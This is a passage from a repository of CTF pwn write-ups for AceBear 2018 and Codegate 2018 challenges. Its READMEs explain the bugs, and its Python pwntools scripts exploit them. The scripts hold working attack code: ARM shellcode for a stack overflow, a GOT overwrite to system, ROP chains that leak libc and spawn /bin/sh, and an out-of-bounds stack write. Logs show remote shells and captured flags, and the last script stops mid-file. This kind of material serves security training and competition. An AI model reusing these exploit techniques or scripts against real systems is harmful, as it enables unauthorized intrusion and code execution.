├── 2018 ├── AceBearSecurityContest │ ├── README.md │ └── pwn │ │ ├── arm_exploit │ │ ├── README.md │ │ ├── arm-exploit │ │ └── arm_exploit.py │ │ ├── easy_heap │ │ ├── README.md │ │ ├── easy_heap │ │ ├── easy_heap.py │ │ └── easyheap_libc.so.6 │ │ └── lolgame │ │ ├── LOLgame │ │ ├── README.md │ │ └── lolgame.py ├── Codegate CTF 2018 Preliminary │ ├── BaskinRobins31 │ │ ├── BaskinRobins31 │ │ └── BaskinRobins31.py │ ├── marimo │ │ ├── marimo │ │ └── marimo.py │ └── melong │ │ ├── melong │ │ └── melong.py ├── HITBXCTF │ ├── misc │ │ ├── pix │ │ │ ├── README.md │ │ │ ├── aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate │ │ │ └── keepass.kdbx │ │ └── tpyx │ │ │ ├── README.md │ │ │ ├── e47c7307-b54c-4316-9894-5a8daec738b4.png │ │ │ ├── flag │ │ │ ├── tpyx │ │ │ ├── tpyx2 │ │ │ └── tpyx2.zlib │ └── pwn │ │ ├── babypwn │ │ └── babypwn.py │ │ ├── d │ │ ├── d │ │ └── d.py │ │ └── once │ │ ├── libc-2.23.so │ │ ├── once │ │ └── once.py ├── ISITDTU CTF 2018 Quals │ ├── babyformat │ │ ├── babyformat │ │ └── babyformat.py │ └── encode │ │ └── encode.py ├── N1CTF │ └── pwn │ │ └── beeper │ │ ├── beeper │ │ └── beeper.py ├── Ph03nixCTF-2018 │ └── RE │ │ ├── RE150 │ │ └── chall-0124a47969d0e6ff9ff639198decbea2 │ │ ├── RE200 │ │ ├── RE200.exe │ │ ├── RE200.py │ │ ├── README.md │ │ └── re200.bat │ │ └── RE350 │ │ ├── README.md │ │ ├── chall-95464f47e71ccb883149755d7a3573bb │ │ └── chall-95464f47e71ccb883149755d7a3573bb.py ├── VolgaCTF │ ├── CrackMe │ │ └── CrackMe.py │ ├── You_Shall_Not_Pass │ │ ├── README.md │ │ └── solve.py │ ├── lights │ │ ├── README.md │ │ └── lights.idb │ └── xor_trick │ │ ├── MeePwn.png │ │ └── xor_trick.py ├── WhiteHatGrandPrix2018quals │ ├── giftshop_pwn01 │ │ ├── README.md │ │ ├── blacklist.conf │ │ ├── flag.txt │ │ ├── giftshop │ │ ├── giftshop.py │ │ ├── ptrace_64 │ │ └── run.sh │ └── re06 │ │ ├── README.md │ │ ├── re06.cs │ │ ├── result.png │ │ └── reverse.exe ├── angstromCTF │ ├── hellcode │ │ ├── hellcode │ │ └── hellcode.py │ └── letter │ │ ├── letter.py │ │ └── personal_letter32 ├── bytebandit │ ├── ROP_Crazy │ │ ├── gg │ │ └── ropcrazy.py │ └── twisted │ │ ├── libc.so.6 │ │ ├── twisted.py │ │ ├── twisted_local.py │ │ └── twisted_patched ├── insecurity-insa │ └── Gcorp Stage 2 │ │ ├── dna │ │ └── dna.py ├── matesctf_pwn │ ├── bmhh │ │ ├── bmhh │ │ └── bmhh.py │ ├── echo │ │ ├── echo │ │ └── echo.py │ ├── explorer │ │ ├── explorer │ │ └── explorer.py │ ├── harrypotter │ │ ├── harrypotter │ │ └── harrypotter.py │ ├── petshop │ │ ├── petshop │ │ └── petshop.py │ └── unexploitable │ │ ├── payload │ │ ├── vuln_app │ │ └── vuln_app.py ├── matesctf_session3 │ └── round2 │ │ ├── libc-2.23.so │ │ ├── xmodem │ │ └── xmodem.py ├── pragyan │ ├── aes_enc_unbf │ │ ├── aes_enc_unbf │ │ ├── aes_enc_unbf.py │ │ ├── iv.aes │ │ └── key.aes │ └── police_academy │ │ ├── police_academy │ │ └── police_academy.py ├── sunshinectf │ ├── Hexalicious │ │ ├── Hexalicious.py │ │ ├── flag.txt │ │ ├── hexalicious │ │ └── libpwnableharness32.so │ ├── UAF │ │ ├── libc.so.6 │ │ ├── libpwnableharness32.so │ │ ├── uaf │ │ └── uaf.py │ ├── logsearch │ │ ├── .data │ │ ├── flag.txt │ │ ├── libpwnableharness32.so │ │ ├── logs.txt │ │ ├── logsearch │ │ └── logsearch.py │ └── rot13 │ │ ├── libc.so.6 │ │ ├── libpwnableharness32.so │ │ ├── rot13 │ │ └── rot13.py └── swampctf │ ├── Dungeon_Crawl │ ├── dungeon.py │ └── libc.so.6 │ ├── Power_QWORD │ ├── libc.so.6 │ ├── power │ └── power.py │ └── Syscaller_Lament │ ├── syscaller │ └── syscaller.py ├── 2019 ├── Insomni'hack teaser 2019 │ └── onewrite │ │ ├── onewrite │ │ └── onewrite.py ├── defcon │ └── speedrun │ │ └── speedrun-001 │ │ ├── README.md │ │ ├── speedrun-001 │ │ ├── speedrun-001.1 │ │ └── speedrun-001.py ├── hitcon_quals │ └── trick_or_treat │ │ ├── libc.so.6 │ │ ├── trick_or_treat │ │ └── trick_or_treat.py └── tetctf.cf │ ├── babyfirst │ ├── babyfirst │ ├── babyfirst.py │ └── libc-2.27.so │ └── sandbox │ ├── README.md │ ├── program │ ├── sandbox │ ├── sandbox.py │ ├── server.py │ ├── test │ └── test.c ├── 2020 └── tetctf │ └── babyarmshellcode │ ├── binary │ ├── babyfmt │ │ ├── babyfmt │ │ └── run.sh │ └── babyshellcode │ │ ├── babyshellcode │ │ └── run.sh │ ├── solution │ ├── babyshellcode.py │ └── server_backconnect.py │ └── xinetd.d │ ├── babyfmt_xinetd │ └── babyshellcode_xinetd ├── 2021 └── ISITDTU_final │ ├── main.c │ └── solve.py ├── 2022 ├── ISITDTU CTF 2022 FINALS │ └── whitelist_sc │ │ ├── whitelist_sc │ │ └── whitelist_sc.py └── TetCTF 2023 │ └── pwn01 │ ├── 1MB │ ├── chall │ ├── libc.so.6 │ └── solve.py ├── 2023 └── ISITDTU CTF QUALS 2023 │ └── pivot │ ├── packets_cleartext.pcap │ ├── packets_pubkey.pcap │ ├── pivot.c │ ├── pivot.py │ ├── pivot_docker.tar.gz │ ├── plaintext.pcap │ └── pubkey.pcap ├── README.md └── quiz └── cau48 ├── cau48 ├── cau48.c └── cau48.py /2018/AceBearSecurityContest/README.md: -------------------------------------------------------------------------------- 1 | # AceBear Security Contest 2 | * 3 | * [Scoreboard](https://ctf.acebear.site/scoreboard) 4 | * Facebook: 5 | 6 | # Writeups 7 | * [easy heap](pwn/easy_heap) 8 | * [arm_exploit](pwn/arm_exploit) 9 | * [lolgame](pwn/lolgame) 10 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/README.md: -------------------------------------------------------------------------------- 1 | # arm-exploit 2 | **Category:** Pwnable 3 | **Points:** 856 4 | **Solves:** 13 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=1aM2CTWFxKetOTMNfck71Bxv_ZGw05IzF) 7 | > Service: nc armexploit.acebear.site 3001 8 | 9 | ## Writeup 10 | ``` 11 | $ file arm-exploit 12 | arm-exploit: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=cbaf26f5088911adc7a36ef8ac96660a33f617d1, not stripped 13 | ``` 14 | 15 | ### Setup Environment 16 | #### Install 17 | ``` 18 | sudo apt-get install qemu 19 | sudo apt-get install qemu-user-static kpartx 20 | sudo apt-get install gdb-multiarch 21 | ``` 22 | 23 | #### Run 24 | ``` 25 | $ qemu-arm-static ./arm-exploit 26 | **************************Welcome to Arm Exploit************************** 27 | * * 28 | *************************Challenge Created By CNV************************* 29 | * Team: AceBear * 30 | * My blog: https://chung96vn.blogspot.com/ * 31 | ************************************************************************** 32 | *******************Arm Exploit****************** 33 | * * 34 | * 1 - info * 35 | * 2 - login * 36 | * 3 - echo * 37 | * 4 - change username * 38 | * 5 - exit * 39 | ************************************************ 40 | Your choice: 41 | ``` 42 | 43 | #### Debug over gdb-multiarch 44 | Terminal 1 45 | > qemu-arm-static -g 12345 ./arm-exploit 46 | 47 | Terminal 2 48 | ``` 49 | $ gdb-multiarch 50 | pwndbg> set architecture arm 51 | The target architecture is assumed to be arm 52 | pwndbg> target remote localhost:12345 53 | Remote debugging using localhost:12345 54 | 0xf67d6a40 in ?? () 55 | ... 56 | ► f 0 f67d6a40 57 | pwndbg> 58 | ``` 59 | 60 | #### Run over python script 61 | ```python 62 | import pwntools 63 | r = process(["qemu-arm-static","-g","12345", "./arm-exploit"]) # run and debug 64 | r = process(["qemu-arm-static","./arm-exploit"]) # Just run 65 | ``` 66 | 67 | ### The Bug 68 | Binary has some functions: genpass, info, login, echo, change username and exit. 69 | 70 | First bug in **change_username** function: 71 | * user input max 0x20 bytes into buf on stack 72 | * strcpy(USER, buf) if 0x20 bytes buf not null then 0x20 bytes copy into USER and last null bytes will copy to USER+0x20 == isGuestLogin => isGuestLogin = 0 => bypass root login then we can use rootecho function. 73 | ``` 74 | .bss:0002209C USER % 0x20 ; DATA XREF: info+28↑o 75 | .bss:000220BC isGuestLogin % 4 ; DATA XREF: info+48↑r 76 | ``` 77 | 78 | Second bug in **rootecho** function: 79 | * buff in FP-0x88 but read 0x100 bytes => stack overflow. 80 | ```c 81 | int rootecho() 82 | { 83 | int result; // r0 84 | char s1; // [sp+4h] [bp-88h] 85 | _BYTE v2[3]; // [sp+9h] [bp-83h] 86 | int v3; // [sp+84h] [bp-8h] 87 | 88 | v3 = _bss_start; 89 | while ( 1 ) 90 | { 91 | printf("root@arm-exploit:~$ "); 92 | secure_read(&s1, 0x100u); // <======= Bug Here 93 | result = strcmp(&s1, "exit"); 94 | if ( !result ) 95 | break; 96 | if ( !strcmp(&s1, "help") ) 97 | { 98 | puts("List command:"); 99 | puts("$ echo argument"); 100 | puts("$ exit"); 101 | puts("$ help"); 102 | } 103 | else if ( !memcmp(&s1, "echo ", 5u) ) 104 | { 105 | puts(v2); 106 | } 107 | else 108 | { 109 | puts("Invalid Command! Try help"); 110 | } 111 | } 112 | return result; 113 | } 114 | ``` 115 | ### Exploit 116 | [arm_exploit.py](/pwn/arm_exploit/arm_exploit.py) 117 | ``` 118 | $ python arm.py 3 119 | [+] Opening connection to armexploit.acebear.site on port 3001: Done 120 | [*] canary: 0xd4bae800 121 | [*] stack: 0xf6fffb34 122 | [*] buff: 0xf6fffab0 123 | [*] Paused (press any to continue) 124 | [*] Switching to interactive mode 125 | AAAAAAA0\x8f��/�xF\x0e0\x90I\x1a\x92\x1a'�Q\x037�/bin//sh 126 | root@arm-exploit:~$ $ id 127 | uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit) 128 | $ cat /ho*/*/flag 129 | AceBear{arm_i5_my_sad_m3m0ry}$ 130 | ``` 131 | 132 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/arm-exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/arm_exploit/arm-exploit -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/arm_exploit/arm_exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | def arm_exploit(DEBUG="1"): 5 | 6 | def login(username, password): 7 | r.sendline("2") 8 | r.recvuntil("Username: ") 9 | r.sendline(username) 10 | r.recvuntil("password: ") 11 | r.sendline(password) 12 | return r.recvuntil("Your choice: ") 13 | 14 | def info(): 15 | r.sendline("1") 16 | return r.recvuntil("Your choice: ") 17 | 18 | def changename(username): 19 | r.sendline("4") 20 | r.recvuntil("New username: ") 21 | r.sendline(username) 22 | return r.recvuntil("Your choice: ") 23 | 24 | def echo(payload): 25 | r.sendline("3") 26 | r.recvuntil(":~$") 27 | r.send(payload) 28 | if "echo" in payload: 29 | res=r.recvuntil(payload[4:]) 30 | leak = r.recv(4) 31 | r.recvuntil(":~$") 32 | return leak 33 | 34 | def echo2(payload): 35 | r.send(payload) 36 | 37 | if DEBUG=="1": 38 | r = process(["qemu-arm-static","-g","12345", "./arm-exploit"]) 39 | raw_input("Debug?") 40 | elif DEBUG=="2": 41 | r = process(["qemu-arm-static","./arm-exploit"]) 42 | raw_input("Debug?") 43 | elif DEBUG=="3": 44 | HOST = "armexploit.acebear.site" 45 | PORT = 3001 46 | r = remote(HOST,PORT) 47 | 48 | shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00" 49 | 50 | r.recvuntil("Your choice: ") 51 | login("concavang","concavang") # logined = 1 52 | 53 | username = "A"*0x20 54 | changename(username) 55 | username = "root" 56 | changename(username) # isGuestLogin = 0 57 | 58 | payload = "echo " 59 | payload += "C"*0x7c 60 | canary = u32("\x00"+echo(payload)[:3]) 61 | log.info('canary: %#x' % canary) 62 | 63 | payload = "echo " 64 | payload += "C"*0x7f 65 | stack = u32(echo(payload)) 66 | log.info('stack: %#x' % stack) 67 | 68 | buff = stack-0x84 69 | log.info('buff: %#x' % buff) 70 | 71 | 72 | payload = "echo " 73 | payload += "A"*7 74 | payload += shellcode 75 | payload += "C"*(0x74-len(shellcode)) 76 | payload += p32(canary) 77 | payload += p32(buff-0x100) # SP 78 | payload += p32(buff) # PC 79 | 80 | echo2(payload) 81 | pause() 82 | echo2("exit\n") 83 | r.interactive() 84 | 85 | 86 | 87 | 88 | arm_exploit(sys.argv[1]) 89 | 90 | # target remote localhost:12345 91 | # AceBear{arm_i5_my_sad_m3m0ry} 92 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/README.md: -------------------------------------------------------------------------------- 1 | # easy heap 2 | **Category:** Pwnable 3 | **Points:** 100 4 | **Solves:** 44 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=1VNi6Nbi5i-r9D5sZo_ZdgtUkA5u_3g8B) 7 | > Service: nc armexploit.acebear.site 3002 8 | 9 | ## Writeup 10 | ``` 11 | $ file easy_heap 12 | easy_heap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=89e53b704c36245e1ab38a71c9f1349898e373ea, stripped 13 | ``` 14 | 15 | ### The Bug 16 | Binary has some functions: create, edit, delete, show and exit. 17 | 18 | 19 | * We can write address into bss by input **NAME (0x0804B0E0)**. 20 | * Edit, delete, show functions not check idx if it is negative and integer overflow by **DWORD PTR [idx*4+0x0804B0A0]** 21 | 22 | ```c 23 | int show() 24 | { 25 | int idx; // [esp+Ch] [ebp-Ch] 26 | 27 | printf("Index: "); 28 | idx = readInt(); 29 | if ( idx > 9 ) 30 | return puts("Out of list name (0 <= index < 10)!!!"); 31 | if ( !LIST[idx] ) 32 | return puts("None name"); 33 | printf("This name %d is: %s\n", idx, LIST[idx]); 34 | return puts("Done!"); 35 | } 36 | 37 | int edit() 38 | { 39 | int idx; // [esp+Ch] [ebp-Ch] 40 | 41 | printf("Index: "); 42 | idx = readInt(); 43 | if ( idx > 9 ) 44 | return puts("Out of list name (0 <= index < 10)!!!"); 45 | if ( !LIST[idx] ) 46 | return puts("None name"); 47 | printf("Input new name: "); 48 | secure_read(LIST[idx], 0x20u); 49 | return puts("Done!"); 50 | } 51 | ``` 52 | 53 | So we can read and write arbitrary memory address. 54 | 55 | ### Exploit 56 | [easy_heap.py](/pwn/easy_heap/easy_heap.py) 57 | ``` 58 | $ python easy_heap.py 3 59 | [+] Opening connection to easyheap.acebear.site on port 3002: Done 60 | [*] atoi_got: 0xf7def050 61 | [*] baselibc: 0xf7dc2000 62 | [*] system: 0xf7dfc940 63 | [*] str_bin_sh: 0xf7f1b00b 64 | [*] Switching to interactive mode 65 | $ id 66 | uid=1000(easy_heap) gid=1000(easy_heap) groups=1000(easy_heap) 67 | $ cat /ho*/*/flag 68 | AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u}$ 69 | ``` 70 | 71 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easy_heap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/easy_heap/easy_heap -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easy_heap.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def easy_heap(DEBUG): 6 | t = 0.3 7 | def Add(index, name): 8 | r.sendline("1") 9 | r.recvuntil("Index: ") 10 | r.sendline(str(index)) 11 | r.recvuntil("Input this name: ") 12 | r.send(name) 13 | time.sleep(t) 14 | res = r.recvuntil("Your choice:") 15 | return res 16 | 17 | def View(idx): 18 | r.sendline("4") 19 | r.recvuntil("Index: ") 20 | r.sendline(str(idx)) 21 | res = r.recvuntil("Done!") 22 | r.recvuntil("Your choice:") 23 | return res 24 | 25 | def Delete(idx): 26 | r.sendline("3") 27 | r.recvuntil("Index: ") 28 | r.sendline(str(idx)) 29 | res = r.recvuntil("Your choice:") 30 | return res 31 | 32 | def Edit(idx, name): 33 | r.sendline("2") 34 | r.recvuntil("Index: ") 35 | r.sendline(str(idx)) 36 | r.recvuntil("Input new name: ") 37 | r.send(name) 38 | time.sleep(t) 39 | res = r.recvuntil("Your choice:") 40 | return res 41 | 42 | 43 | def Exit(): 44 | r.sendline("5") 45 | 46 | if DEBUG=="1": 47 | t = 0.005 48 | r = process("./easy_heap") 49 | libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 50 | raw_input("debug?") 51 | elif DEBUG=="2": 52 | t = 0.01 53 | env = { 54 | 'LD_PRELOAD': './easyheap_libc.so.6' 55 | } 56 | r = process("./easy_heap",env=env) 57 | libc = ELF('./easyheap_libc.so.6') 58 | raw_input("debug?") 59 | elif DEBUG=="3": 60 | offset_main_arena = 0x3c3af0 61 | libc = ELF('./easyheap_libc.so.6') 62 | HOST = 'easyheap.acebear.site' 63 | PORT = 3002 64 | r = remote(HOST,PORT) 65 | 66 | free_got = 0x804B018 67 | atoi_got = 0x0804B038 68 | stdout = 0x0804B084 69 | NAME = p32(atoi_got) # 0x0804B0E0 70 | AGE = 0x40 71 | r.recvuntil("Give me your name: ") 72 | r.sendline(NAME) 73 | r.recvuntil("Your age: ") 74 | r.sendline(str(AGE)) 75 | r.recvuntil("Your choice: ") 76 | 77 | idx = -2147483632 # idx < 9, DWORD PTR [idx*4+0x0804B0A0] == 0x0804B0E0 (NAME) 78 | # leak atoi_got 79 | res = View(idx) 80 | atoi_got = u32(res.split(" is: ")[1][:4]) 81 | baselibc = atoi_got - libc.symbols['atoi'] 82 | system = baselibc + libc.symbols['system'] 83 | str_bin_sh = baselibc+next(libc.search("/bin/sh")) 84 | 85 | log.info('atoi_got: %#x' % atoi_got) 86 | log.info('baselibc: %#x' % baselibc) 87 | log.info('system: %#x' % system) 88 | log.info('str_bin_sh: %#x' % str_bin_sh) 89 | 90 | # overwrite atoi_got by system address 91 | Edit(idx, p32(system)) 92 | r.sendline("/bin/sh") 93 | 94 | r.interactive() 95 | 96 | easy_heap(sys.argv[1]) 97 | # AceBear{m4yb3_h34p_i5_3a5y_f0r_y0u} -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/easy_heap/easyheap_libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/easy_heap/easyheap_libc.so.6 -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/LOLgame: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/AceBearSecurityContest/pwn/lolgame/LOLgame -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/README.md: -------------------------------------------------------------------------------- 1 | # lol game 2 | **Category:** Pwnable 3 | **Points:** 831 4 | **Solves:** 14 5 | **Description:** 6 | > Download in : [Link](https://drive.google.com/open?id=15XYB41jAtwH58LxNDhRQSXWHaqzJ9cdZ) 7 | > Service: nc armexploit.acebear.site 3004 8 | 9 | ## Writeup 10 | ``` 11 | $ file LOLgame 12 | LOLgame: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=a9d22e211c215fa4e68630a6cf0c9eeb610eba24, stripped 13 | ``` 14 | 15 | ### The Bug 16 | Binary has some functions: Play, showScore, ChangeName and exit. 17 | 18 | Function ChangeName: 19 | ```c 20 | int __cdecl main() 21 | { 22 | char name; // [esp+4h] [ebp-E4h] 23 | char round; // [esp+14h] [ebp-D4h] 24 | ... 25 | ChangeName(&name); 26 | ... 27 | } 28 | ``` 29 | ```c 30 | int __cdecl ChangeName(void *buf) 31 | { 32 | ssize_t size; // eax 33 | int result; // eax 34 | ssize_t _size; // [esp+Ch] [ebp-Ch] 35 | 36 | size = read(0, buf, 0x11u); 37 | _size = size; 38 | result = *(buf + size - 1); 39 | if ( result == 10 ) 40 | { 41 | result = buf + _size - 1; 42 | *result = 0; 43 | } 44 | return result; 45 | } 46 | ``` 47 | 48 | We can see stack overflow in ChangeName function. 49 | * name in ebp-0xE4 50 | * round in ebp-0xD4 51 | * but read(0, name, 0x11) 52 | so we can overwrite **round** variable. 53 | 54 | In Play function: 55 | * We can bet any points (both positive and negative number) 56 | * We always lose, then *(&game->round + game->round) = -bet; 57 | 58 | We can control game->round by ChangeName function, we can bet any points. So we can overwrite return address on stack. 59 | 60 | ### Exploit 61 | [lolgame.py](/pwn/lolgame/lolgame.py) 62 | ``` 63 | $ python lolgame.py 2 64 | [+] Opening connection to lolgame.acebear.site on port 3004: Done 65 | [*] write at 57 value 0x80483c0 66 | [*] write at 58 value 0x8048a2a 67 | [*] write at 59 value 0x8049108 68 | [*] printf: 0xf7dab880 69 | [*] baselibc: 0xf7d62000 70 | [*] system: 0xf7d9c900 71 | [*] str_bin_sh: 0xf7ebf00f 72 | [*] write at 55 value 0xf7d9c900 73 | [*] write at 56 value 0x8048a2a 74 | [*] write at 57 value 0xf7ebf00f 75 | ? 76 | [*] Switching to interactive mode 77 | Bye!$ id 78 | uid=1000(lolgame) gid=1000(lolgame) groups=1000(lolgame) 79 | $ cat /ho*/*/flag 80 | AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n}$ 81 | ``` 82 | 83 | -------------------------------------------------------------------------------- /2018/AceBearSecurityContest/pwn/lolgame/lolgame.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def LOLgame(DEBUG): 6 | def showScore(): 7 | r.sendline("2") 8 | return r.recvuntil("Your Choice:\n") 9 | 10 | def ChangeName(name): 11 | r.sendline("3") 12 | r.recvuntil("Enter your name: ") 13 | r.send(name) 14 | return r.recvuntil("Your Choice:\n") 15 | 16 | def Play(point): 17 | r.sendline("1") 18 | r.recvuntil("Enter Your Bet Point: ") 19 | r.sendline(str(point)) 20 | r.sendline("1") 21 | r.sendline("1") 22 | r.sendline("2") 23 | r.sendline("2") 24 | r.sendline("3") 25 | r.sendline("3") 26 | return r.recvuntil("Your Choice:\n") 27 | 28 | def write(offset, value): 29 | log.info('write at %d value %#x' % (offset, value)) 30 | ChangeName("A"*0x10+chr(offset)) 31 | Play(-value) 32 | 33 | def Exit(): 34 | r.sendline("4") 35 | 36 | if DEBUG=="1": 37 | offset_printf = 0x00049670 38 | offset_system = 0x0003ada0 39 | offset_str_bin_sh = 0x15ba0b 40 | r = process("./LOLgame") 41 | raw_input("debug?") 42 | elif DEBUG=="2": 43 | offset_system = 0x0003a900 44 | offset_str_bin_sh = 0x15d00f 45 | offset_printf = 0x00049880 46 | HOST = 'lolgame.acebear.site' 47 | PORT = 3004 48 | r = remote(HOST,PORT) 49 | 50 | printf_plt = 0x080483C0 51 | puts_plt = 0x080483D0 52 | puts_got = 0x0804910C 53 | printf_got = 0x08049108 54 | __libc_start_main_got = 0x08049110 55 | main = 0x08048A2A 56 | ret = 0x08048B72 57 | bye = 0x08048B59 58 | 59 | name = "A"*0x10 60 | name += chr(0x35) 61 | r.recvuntil("Enter your name: ") 62 | r.send(name) 63 | 64 | write(0x39, printf_plt) 65 | write(0x3a, main) 66 | write(0x3b, printf_got) 67 | Exit() 68 | r.recvuntil("Bye!") 69 | printf = u32(r.recv(4)) 70 | log.info('printf: %#x' % printf) 71 | baselibc = printf - offset_printf 72 | system = baselibc + offset_system 73 | str_bin_sh = baselibc + offset_str_bin_sh 74 | log.info('baselibc: %#x' % baselibc) 75 | log.info('system: %#x' % system) 76 | log.info('str_bin_sh: %#x' % str_bin_sh) 77 | 78 | name = "A"*0x10 79 | name += chr(0x35) 80 | r.recvuntil("Enter your name: ") 81 | r.send(name) 82 | write(0x37, system) 83 | write(0x38, main) 84 | write(0x39, str_bin_sh) 85 | 86 | raw_input("?") 87 | Exit() 88 | 89 | r.interactive() 90 | 91 | LOLgame(sys.argv[1]) 92 | # AceBear{tH4_r00t_1s_pr0gr4m_l3u7_u_are_hum4n} 93 | # https://libc.blukat.me/?q=puts%3A0xf7e69940%2C__libc_start_main%3A0xf7d74180%2Cprintf%3A0xf7dfb880&l=libc6-i386_2.24-9ubuntu2.2_amd64 -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31 -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/BaskinRobins31/BaskinRobins31.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def BaskinRobins31(DEBUG): 6 | t = 0.3 7 | 8 | if DEBUG=="1": 9 | t = 0.005 10 | r = process("./BaskinRobins31") 11 | offset_main_arena = 0x3c4af0 12 | offset_one_gadget = 0xf1117 13 | # libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 14 | raw_input("debug?") 15 | elif DEBUG=="2": 16 | offset___libc_start_main = 0x0000000000020740 17 | offset_system = 0x0000000000045390 18 | offset_str_bin_sh = 0x18cd57 19 | # libc = ELF('./libc_64.so.6') 20 | HOST = 'ch41l3ng3s.codegate.kr' 21 | PORT = 3131 22 | r = remote(HOST,PORT) 23 | 24 | pop_rdi_ret = 0x400bc3 25 | printf_plt = 0x4006E0 26 | printf_got = 0x602030 27 | __libc_start_main_got = 0x602048 28 | main = 0x400A4B 29 | # Author = "A"*0x40 30 | r.recvuntil("How many numbers do you want to take ? (1-3)") 31 | payload = "A"*0xb8 32 | payload += p64(pop_rdi_ret) 33 | payload += p64(__libc_start_main_got) 34 | payload += p64(printf_plt) 35 | payload += p64(main) 36 | r.sendline(payload) 37 | r.recvuntil("Don't break the rules...:( \n") 38 | 39 | res = r.recvuntil("#")[:-1] 40 | __libc_start_main = u64(res.ljust(8,"\x00")) 41 | log.info('__libc_start_main: %#x' % __libc_start_main) 42 | baselibc = __libc_start_main - offset___libc_start_main 43 | system = baselibc + offset_system 44 | bin_sh = baselibc + offset_str_bin_sh 45 | log.info('baselibc: %#x' % baselibc) 46 | log.info('system: %#x' % system) 47 | log.info('bin_sh: %#x' % bin_sh) 48 | 49 | payload = "A"*0xb8 50 | payload += p64(pop_rdi_ret) 51 | payload += p64(bin_sh) 52 | payload += p64(system) 53 | payload += p64(main) 54 | r.sendline(payload) 55 | r.interactive() 56 | 57 | BaskinRobins31(sys.argv[1]) 58 | 59 | -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/marimo/marimo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/marimo/marimo -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/marimo/marimo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def marimo(DEBUG): 6 | t = 0.3 7 | def Special(name, profile): 8 | r.sendline("show me the marimo") 9 | r.recvuntil(">> ") 10 | r.sendline(name) 11 | # time.sleep(t) 12 | r.recvuntil(">> ") 13 | r.sendline(profile) 14 | # time.sleep(t) 15 | return r.recvuntil(">> ") 16 | 17 | 18 | def Shell(idx): 19 | r.sendline("S") 20 | r.recvuntil(">> ") 21 | r.sendline(str(idx)) 22 | res = r.recvuntil(" dollars.") 23 | r.sendline("S") 24 | r.recvuntil(">> ") 25 | return res 26 | 27 | def View(idx, newprofile=""): 28 | r.sendline("V") 29 | r.recvuntil(">> ") 30 | r.sendline(str(idx)) 31 | res = r.recvuntil(">> ") 32 | if len(newprofile)>0: 33 | r.sendline("M") 34 | r.recvuntil(">> ") 35 | r.sendline(newprofile) 36 | res = r.recvuntil(">> ") 37 | # time.sleep(t) 38 | r.sendline("B") 39 | r.recvuntil(">> ") 40 | return res 41 | def Wait(seconds): 42 | for i in xrange(seconds): 43 | log.info("%d/%d seconds" % (i,seconds)) 44 | time.sleep(1) 45 | 46 | def Exit(): 47 | r.sendline("Q") 48 | 49 | if DEBUG=="1": 50 | t = 0.005 51 | offset_system = 0x45390 52 | offset__libc_start_main = 0x20740 53 | r = process("./marimo") 54 | raw_input("debug?") 55 | elif DEBUG=="2": 56 | # libc6_2.23-0ubuntu10_amd64 57 | offset_system = 0x45390 58 | offset__libc_start_main = 0x20740 59 | HOST = 'ch41l3ng3s.codegate.kr' 60 | PORT = 3333 61 | r = remote(HOST,PORT) 62 | 